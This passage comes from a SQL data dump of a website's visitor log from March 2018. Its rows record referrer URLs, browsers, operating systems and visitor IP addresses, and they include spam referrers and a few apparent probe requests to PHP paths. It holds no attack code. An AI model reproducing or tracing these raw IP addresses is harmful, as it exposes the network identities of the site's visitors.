blgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(26838,'2018-03-18','https://zphiblgz.org','Chrome','Linux','64.0.3282.119','','101.199.121.77','000',1,0),(26839,'2018-03-18','https://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','101.199.112.50','000',1,0),(26840,'2018-03-18','https://zphiblgz.org','Chrome','Windows','50.0.2661.102','','106.120.162.94','000',1,0),(26841,'2018-03-18','http://rangjued.com/','Opera','Windows','8.01','','46.119.121.22','000',1,0),(26842,'2018-03-18','https://zphiblgz.org/','Chrome','Windows','63.0.3239.132','','149.202.50.209','000',1,0),(26843,'2018-03-18','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(26844,'2018-03-18','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.32','000',1,0),(26845,'2018-03-18','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.32','000',1,0),(26846,'2018-03-18','https://zphiblgz.org','my','Unknown','Unknown','','193.106.30.99','000',1,0),(26847,'2018-03-18','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.124','000',1,0),(26848,'2018-03-18','https://natprof.ru/','Opera','Windows','7.60','','178.137.91.90','000',3,0),(26849,'2018-03-18','https://zphiblgz.org','Chrome','Unknown','64.0.3282.167','','138.197.96.241','000',2,0),(26850,'2018-03-18','https://zphiblgz.org','Chrome','Macintosh','35.0.1916.114','','138.197.96.241','000',2,0),(26851,'2018-03-18','https://zphiblgz.org','Firefox','Linux','31.0','','217.113.119.89','000',4,0),(26852,'2018-03-18','https://www.google.com/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',2,0),(26853,'2018-03-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1730.x7dIIM6onSsBtC9H6Z9bf8xInDSKvZijOkyW4KMpvFo.92ecc63ec492bf4587a24e982a0fc0fb8d31992c&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Wm1xbWRtZ25Qa3JyLU9RbjJSWnlMVUJQN1hhVG4za3phNFNGYUlCZGlIQSws&sign=bec2fdbdac36cb5a857d902aa8c51ea9&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.194.84','000',2,0),(26854,'2018-03-18','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.29','000',1,0),(26855,'2018-03-18','http://zphiblgz.org/','Firefox','Windows','52.51.98','','46.174.114.209','000',2,0),(26856,'2018-03-18','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(26857,'2018-03-18','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.32','000',1,0),(26858,'2018-03-18','https://zphiblgz.org','Chrome','Chrome OS','30.0.1599.38','','74.63.196.146','000',5,0),(26859,'2018-03-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1730.tdMibx-vONgUhR6NWMIRGFwyKvXlA85izW92ARu4fDI.92600e8da2430a3b9df5cb1805d128ca52502c78&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040Q2pESDJjQUZqQjlVUVpLbmtKNmVwTVlJd1NzaEtyQ2ZTOVJ0X29vMXNZZyws&sign=80f0978b2e132810e9ab2ae56b2b2b09&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','151.236.20.43','000',2,0),(26860,'2018-03-18','https://picturesmania.com/','MSIE','Windows','6.0','','178.137.86.152','000',2,0),(26861,'2018-03-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1730.KZ_JWvYyqPB6xHt2jPfDan20hB11ciz1TIeGx_-cavw.c37c051ea1b4f8bec44dbd52b99fffab86bf1422&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040OTU3ZDRDLVhjdnlDRFcxM2QwUi1FempfbXNoQXU1SUNpQXVOUVVPWVRFdyws&sign=0e706fe3eb16504f33c5b3c34a7eee28&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.249.135','000',2,0),(26862,'2018-03-18','https://zphiblgz.org','Chrome','Windows','65.0.3325.146','','198.20.103.246','000',1,0),(26863,'2018-03-18','https://mamasuper.prom.ua/','MSIE','Windows','6.0','','46.119.121.22','000',4,0),(26864,'2018-03-18','https://zphiblgz.org','Firefox','Windows','40.1','','89.90.172.91','000',2,0),(26865,'2018-03-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','192.198.80.227','000',2,0),(26866,'2018-03-18','https://zphiblgz.org','Firefox','Windows','40.1','','80.182.242.206','000',2,0),(26867,'2018-03-18','https://www.google.com/','Safari','iPhone','11.0','','107.77.210.92','000',3,0),(26868,'2018-03-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(26869,'2018-03-18','https://zphiblgz.org','Chrome','Macintosh','51.0.2704.84','','166.62.126.3','000',2,0),(26870,'2018-03-18','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.65','000',1,0),(26871,'2018-03-18','https://zphiblgz.org','Firefox','Windows','40.1','','62.83.111.159','000',2,0),(26872,'2018-03-18','https://zphiblgz.org','AppleWebKit','Windows','534','','157.55.39.74','000',2,0),(26873,'2018-03-18','https://zphiblgz.org','MSIE','Windows','11.0','','50.202.157.138','000',13,0),(26874,'2018-03-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(26875,'2018-03-18','https://zphiblgz.org/','Firefox','Windows','47.0','','77.120.125.23','000',2,0),(26876,'2018-03-18','http://komp-pomosch.ru/','MSIE','Windows','6.0','','46.118.152.50','000',1,0),(26877,'2018-03-18','http://chiefessay.biz','Firefox','Windows','34.1','','77.120.125.23','000',2,0),(26878,'2018-03-18','https://sovetskie-plakaty.ru/','MSIE','Windows','6.0','','37.115.112.228','000',3,0),(26879,'2018-03-18','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','5.9.112.6','000',1,0),(26880,'2018-03-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','146.185.223.252','000',1,0),(26881,'2018-03-18','https://zphiblgz.org','Firefox','Windows','34.0','','193.106.30.99','000',1,0),(26882,'2018-03-18','https://zphiblgz.org','AppleWebKit','Windows','534','','40.77.179.227','000',1,0),(26883,'2018-03-18','https://www.google.com/','Safari','iPhone','11.0','','172.58.168.10','000',3,0),(26884,'2018-03-18','https://owa.howardcc.edu/owa/','Chrome','Windows','64.0.3282.186','','68.134.4.123','000',8,0),(26885,'2018-03-18','https://owa.howardcc.edu/owa/','Chrome','Macintosh','65.0.3325.162','','76.100.110.92','000',2,0),(26886,'2018-03-18','https://zphiblgz.org','NYU','Unknown','Unknown','','5.188.9.80','000',5,0),(26887,'2018-03-18','https://dermatovenerologiya.com/','Unknown','Unknown','Unknown','','178.137.91.90','000',2,0),(26888,'2018-03-18','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(26889,'2018-03-18','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.32','000',1,0),(26890,'2018-03-18','http://www.google.com/','Chrome','Android','65.0.3325.109','','73.191.53.140','000',2,0),(26891,'2018-03-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(26892,'2018-03-19','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(26893,'2018-03-19','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.31','000',1,0),(26894,'2018-03-19','http://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.125','000',2,0),(26895,'2018-03-19','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.35','000',2,0),(26896,'2018-03-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(26897,'2018-03-19','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(26898,'2018-03-19','https://zphiblgz.org','SafeDNSBot','Unknown','Unknown','','159.65.205.51','000',4,0),(26899,'2018-03-19','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(26900,'2018-03-19','https://zphiblgz.org','Firefox','Windows','57.0','','192.198.80.227','000',1,0),(26901,'2018-03-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1731.pvU0vLHk8my0MK2ieAmqPbIYRbdszu_4YnbjnAIteOY.8c23d5ffefefea7a29c6ae6a2d7c3b85c61dbbda&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041NWQ1WXQ3YlNGSm5UM3ZEeHFRN2kzbHpoUTVmWW1xNnpKRmpPOUNqTVVDQSws&sign=c391a6389f9b361d9dfda3334b7f67fe&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.147.207','000',2,0),(26902,'2018-03-19','http://strady.org.ua/','MSIE','Windows','6.0','','134.249.66.84','000',3,0),(26903,'2018-03-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1731.V6e6gm_s9AL60UyxuDcInXGdBozkHEaLqhNP1SxrVNQ.f193cf5916f7b86f56235924d06389c2819b31ea&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043VDFoaUNoQUg1XzhVbC11VXFHTmlscHRjcmtIdEZWbHk4TTJrRGZXeUktUSws&sign=16900ca7abe75d1af0aad814ce804da8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','151.236.20.43','000',2,0),(26904,'2018-03-19','http://svetka.info/','MSIE','Unknown','6.0','','46.118.152.50','000',2,0),(26905,'2018-03-19','https://zphiblgz.org','Chrome','Windows','60.0.3112.113','','212.83.178.172','000',1,0),(26906,'2018-03-19','http://autoblog.org.ua/','Unknown','Unknown','Unknown','','178.159.37.55','000',3,0),(26907,'2018-03-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1731.f1B_YUzM-xVX7WEIjUBh1qtTUnC-44gZHvzwTtlU2dU.0f834d5e2e00fef57ab22c34d53fbc2787eaa4b6&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043RjBFOTQwWW9yUWxaNXlkUTFhX05YSmFOTmpCMk1yZjBtRl81dVNLaG0tZyws&sign=0115c759560a6dd0a1e675d16156afc0&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.179.71','000',2,0),(26908,'2018-03-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1731.vqD18KEveO2T36jIOSlrkkx_FVzRNUqjJvsnEM6DzWk.e8da7ce44dc5bf2a3358bb5d3113615904e4f87a&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041RE9zWEhPbTJlZEQtZUhEcnoxLW0zdDF0OTZOUVFWXzd2VmxKMkhhc2RQUSws&sign=e70d7fcd3911fc83d60ad26e4530941b&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.181.239','000',2,0),(26909,'2018-03-19','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.155','000',1,0),(26910,'2018-03-19','https://zphiblgz.org/scholarship/','MSIE','Windows','10.0','','173.254.216.66','000',1,0),(26911,'2018-03-19','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.174','000',3,0),(26912,'2018-03-19','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.166','000',3,0),(26913,'2018-03-19','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',3,0),(26914,'2018-03-19','https://zphiblgz.org','python-requests','Unknown','2.18.4','','118.219.252.196','000',1,0),(26915,'2018-03-19','http://www.yur-p.ru/','MSIE','Windows','6.0','','178.137.91.90','000',3,0),(26916,'2018-03-19','https://zphiblgz.org','Python-urllib','Unknown','2.7','','1.160.214.52','000',2,0),(26917,'2018-03-19','https://zphiblgz.org','MSIE','Windows','6.0','','204.101.161.159','000',2,0),(26918,'2018-03-19','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.11.236','000',12,0),(26919,'2018-03-19','https://hentai-manga.porn/','MSIE','Windows','7.0b','','46.118.152.50','000',3,0),(26920,'2018-03-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',1,0),(26921,'2018-03-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(26922,'2018-03-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','165.227.39.194','000',1,0),(26923,'2018-03-19','https://zphiblgz.org','Chrome','Windows','34.0.1847.116','','138.68.180.18','000',2,0),(26924,'2018-03-19','https://zphiblgz.org','Chrome','Macintosh','65.0.3325.162','','100.16.228.140','000',1,0),(26925,'2018-03-19','http://essaysuper.biz','Chrome','Windows','62.0.3250.0','','77.120.125.23','000',2,0),(26926,'2018-03-19','https://zphiblgz.org','Firefox','Windows','40.1','','36.83.49.151','000',2,0),(26927,'2018-03-19','https://zphiblgz.org/scholarship/application/','Chrome','Windows','62.0.3202.94','','46.161.9.56','000',2,0),(26928,'2018-03-19','https://zphiblgz.org','Firefox','Windows','40.1','','188.123.218.45','000',2,0),(26929,'2018-03-19','http://zphiblgz.org/404s.php','MSIE','Windows','6.0','','177.142.52.133','000',1,0),(26930,'2018-03-19','https://zphiblgz.org/','Chrome','Windows','61.0.3163.100','','178.159.37.18','000',3,0),(26931,'2018-03-19','https://zphiblgz.org/','Firefox','Windows','40.1','','46.161.9.68','000',3,0),(26932,'2018-03-19','http://lerporn.info/','Opera','Windows','6.01','','178.159.37.55','000',3,0),(26933,'2018-03-19','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(26934,'2018-03-19','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(26935,'2018-03-19','https://www.google.com/','Chrome','Windows','64.0.3282.186','','174.109.57.124','000',2,0),(26936,'2018-03-19','https://zphiblgz.org/','AppleWebKit','Windows','534','','131.253.27.67','000',1,0),(26937,'2018-03-19','https://zphiblgz.org','Firefox','Windows','40.1','','108.251.89.157','000',2,0),(26938,'2018-03-19','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.27','000',1,0),(26939,'2018-03-19','http://zphiblgz.org','Chrome','Linux','63.0.3239.84','','192.132.91.198','000',1,0),(26940,'2018-03-19','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.30','000',1,0),(26941,'2018-03-19','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(26942,'2018-03-19','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.28','000',1,0),(26943,'2018-03-19','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.28','000',1,0),(26944,'2018-03-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.152.120','000',1,0),(26945,'2018-03-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.6.53.161','000',1,0),(26946,'2018-03-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.87.144.70','000',1,0),(26947,'2018-03-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','74.208.16.158','000',1,0),(26948,'2018-03-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.139.190.56','000',1,0),(26949,'2018-03-20','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(26950,'2018-03-20','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.29','000',1,0),(26951,'2018-03-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1733.Rh6Xs82S5JZTcutU_9D-tw_oo4tGzl-IiuwvZDzPCVREAuVy-bhuNP8RqQoVCocS.5d937278f01c7261d08c962fc0fa7aa5cda84b66&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YKCJkrjchpDstTwxTkjwGrA&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlkcHlQZDNhNHZYVTJ2aTJlYWttTXlVMHFJQzBxcWJNSk1VZTctTnVrdEFKdlc5MnduRGNhcWxLNngwanlrU3VQZw&b64e=2&sign=6239af0e2bd300f81e91812c91a5fc54&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93XfrtkbaU_QYIs0N_IPc_ccySXmACMhGvKJEHzFgugOjfoZ4oKWlAIDhB9dZ4LCvv-4LEpO02lLYWTPlu7SDn-2FOgpg2t2rME3XWTfEUm-6bB5QTDzeH9g4R2df9asbn036Es6F&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWQWxj6qvocPzN5uZ4VsGQIlE3blG02ZOiWr6QI6zWif-975CYQCl-Qp1NtUMshFW7XERxSmpNGpA&l10n=ru&cts=1521522128477&mc=3.54371786876','MSIE','Windows','10.0','','109.173.25.162','000',1,0),(26952,'2018-03-20','https://zphiblgz.org','Safari','iPhone','11.0','','96.244.229.165','000',2,0),(26953,'2018-03-20','https://zphiblgz.org','MSIE','Windows','9.0','','74.217.90.250','000',2,0),(26954,'2018-03-20','https://zphiblgz.org','MSIE','Windows','11.0','','74.217.90.250','000',3,0),(26955,'2018-03-20','https://zphiblgz.org','MSIE','Windows','8.0','','74.217.90.250','000',1,0),(26956,'2018-03-20','https://mtsguru.ru/','MSIE','Unknown','6.0','','178.137.86.152','000',1,0),(26957,'2018-03-20','https://petrushka-restoran.ru/','MSIE','Windows','7.0','','178.137.91.90','000',2,0),(26958,'2018-03-20','https://beachtoday.ru/','MSIE','Windows','3.02','','37.115.112.228','000',2,0),(26959,'2018-03-20','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(26960,'2018-03-20','https://zphiblgz.org','Safari','iPhone','9.0','','59.174.169.60','000',1,0),(26961,'2018-03-20','https://zphiblgz.org','Safari','iPhone','9.0','','1.58.195.249','000',1,0),(26962,'2018-03-20','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(26963,'2018-03-20','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(26964,'2018-03-20','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.110','000',1,0),(26965,'2018-03-20','https://zphiblgz.org','Safari','iPhone','11.0','','71.244.128.30','000',6,0),(26966,'2018-03-20','https://zphiblgz.org/scholarship/recommendation/','Safari','iPhone','11.0','','174.205.18.145','000',2,0),(26967,'2018-03-20','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.63.114.215','000',3,0),(26968,'2018-03-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1732.FUe55lXBzCNy5RIly_BwVwozyjH4uNI8-CAsvWTQvfU.0dfd6069c655b82fbdfb4341d05bc27aa8990c12&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UGdrOW03bS1SZFRrZUlqRThzV1BHOFlfN1Jmd083eV9pNjV0eUVjWmtQQSws&sign=951bf1ea9c4a0245b5da338833a48816&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','67.207.85.92','000',2,0),(26969,'2018-03-20','http://zphiblgz.org/scholarship/','Firefox','Macintosh','52.0','','50.225.39.76','000',2,0),(26970,'2018-03-20','https://zphiblgz.org','Safari','Macintosh','11.0.3','','71.179.81.192','000',4,0),(26971,'2018-03-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1732.8Nw6Mph8Zw6nHgag8oK8fFWIc6pfDa8mfvnl99B6J1w.772a05171934aa8f1654e0202ae84dfdb51fee59&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040M3pBb0tmVk1jRUgwcUozMnRKbjlqYlctRGJzeGtKdS1wQ05nMlE2VjZZdyws&sign=826dbb0da31e12bbd3b647e8343f5d6d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','139.59.253.242','000',2,0),(26972,'2018-03-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1732.ROmKqiaiTxHp3fNenymz0AKDzs8WeqUzutKgch8Az9Y.9925f77b5c76cdd418a597b2a5010502108845c4&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041TTlrRnNWTm5idWVocjVQbVFSYWNvLWR3Z1FTLUJIbGNjeFI2c28tSXc3dyws&sign=568c6f2257579fc04dfbdc0a0a3160af&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.90.122.68','000',2,0),(26973,'2018-03-20','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1732._JDwiDbYaJLQaFFq5SQ1K2dSk8eTsFQECtM5sNt6gcg.dba9c7b75355607802e7669ccaa1a34841c0f44b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043T1R3NGtKQzBZeXBDZlVhbFYxYXNVcVVLS2FlQ1UtdDRkRVRiRUVzWVpfdyws&sign=4fd9d2ec2c8156b48dd1675561d3342c&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.234.37','000',2,0),(26974,'2018-03-20','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','46.101.31.105','000',2,0),(26975,'2018-03-20','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','159.65.31.221','000',2,0),(26976,'2018-03-20','https://zphiblgz.org','Firefox','Linux','52.0','','178.79.163.215','000',3,0),(26977,'2018-03-20','https://zphiblgz.org','Safari','iPhone','9.0','','1.58.195.85','000',1,0),(26978,'2018-03-20','https://zphiblgz.org','Safari','iPhone','9.0','','182.101.51.180','000',1,0),(26979,'2018-03-20','https://zphiblgz.org','Chrome','Windows','65.0.3325.162','','86.139.251.194','000',3,0),(26980,'2018-03-20','https://zphiblgz.org','Firefox','Linux','24.0','','73.87.137.159','000',6,0),(26981,'2018-03-20','https://zphiblgz.org','AppleWebKit','Linux','534.34','','54.190.20.65','000',5,0),(26982,'2018-03-20','http://potolokelekor.ru/','MSIE','Windows','6.0','','46.119.121.22','000',5,0),(26983,'2018-03-20','http://zphiblgz.org/wp-content/uploader.php','Chrome','Windows','42.0.2311.152','','195.154.187.58','000',1,0),(26984,'2018-03-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(26985,'2018-03-20','https://www.bing.com/','Edge','Windows','14.14393','','130.18.104.97','000',2,0),(26986,'2018-03-20','http://deart-13.ru/','MSIE','Windows','6.0','','37.115.112.228','000',2,0),(26987,'2018-03-20','https://www.google.com/','Chrome','Windows','65.0.3325.162','','98.117.57.183','000',5,0),(26988,'2018-03-20','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.195.142','000',1,0),(26989,'2018-03-20','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.87.233.140','000',1,0),(26990,'2018-03-20','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.137','000',1,0),(26991,'2018-03-20','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(26992,'2018-03-20','https://zphiblgz.org','MSIE','Windows','8.0','','52.200.221.20','000',1,0),(26993,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Chrome','Android','55.0.2883.87','','196.54.55.23','000',2,0),(26994,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Android Browser','Android','4.0','','84.93.160.67','000',2,0),(26995,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Chrome','Android','38.0.1025.166','','199.249.223.65','000',2,0),(26996,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Firefox','Linux','52.0','','212.92.124.211','000',2,0),(26997,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Chrome','Windows','64.0.3282.186','','84.93.160.67','000',1,0),(26998,'2018-03-20','http://zphiblgz.org/cache/v12/get_started','Chrome','Android','41.0.2272.118','','196.54.55.23','000',1,0),(26999,'2018-03-20','https://zphiblgz.org','python-requests','Unknown','2.18.4','','118.219.252.199','000',1,0),(27000,'2018-03-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','104.140.209.214','000',1,0),(27001,'2018-03-20','https://zphiblgz.org','Opera','Windows','8.50','','104.140.209.214','000',1,0),(27002,'2018-03-20','https://laminat.com.ua/','Unknown','Unknown','Unknown','','46.118.152.50','000',2,0),(27003,'2018-03-20','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',2,0),(27004,'2018-03-20','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(27005,'2018-03-20','https://zphiblgz.org','MSIE','Windows','11.0','','208.253.105.254','000',2,0),(27006,'2018-03-20','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.158','000',2,0),(27007,'2018-03-20','https://zphiblgz.org','Edge','Windows','16.16299','','73.129.23.250','000',3,0),(27008,'2018-03-20','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.166','000',2,0),(27009,'2018-03-20','https://zphiblgz.org','SamsungBrowser','Android','6.4','','68.134.4.123','000',4,0),(27010,'2018-03-20','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','173.239.240.16','000',1,0),(27011,'2018-03-20','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',2,0),(27012,'2018-03-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1733.WuSnFctrLxdIKTIe6_ckN4gobw94-XAEpWhRZDYwU9o1fxLOPegP6qHN2h9NCACV.c619737493383f75059a9ab863831bc2990a9e38&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV2REMmNVN0R2VGlZYk8tX2ZmYTdLZ2RPNlNaMVhqSXh4N19MUldTcDhsVzlyd0wtUlZHWjNmSVlObjdDU0JrT1Q1UVdidnJWZkRTbGNoMUJKSjQyNmtfeGEyWGh3TzVUekFPUEU3MDZCR2d2d191Q3N3QnVHOXphYlRXRFFoOVVZSkN6dWRVRlZ1Zno0SFhQZGF1bkVr&b64e=2&sign=86f2385568a9a2c56880f03959dc8613&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4uxSkwIHrA9ktqWpp3d_0BASdYqg7KEK2wS2zdNTdQwOzpnRxpzCEyPj0pUgDPTP1wd_0E7GX7tAAYCPlQXJJ5ymxiz43xAx72PndihwNY0gLpd3KPnwFCQ&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXdCnh-_wii4VDS3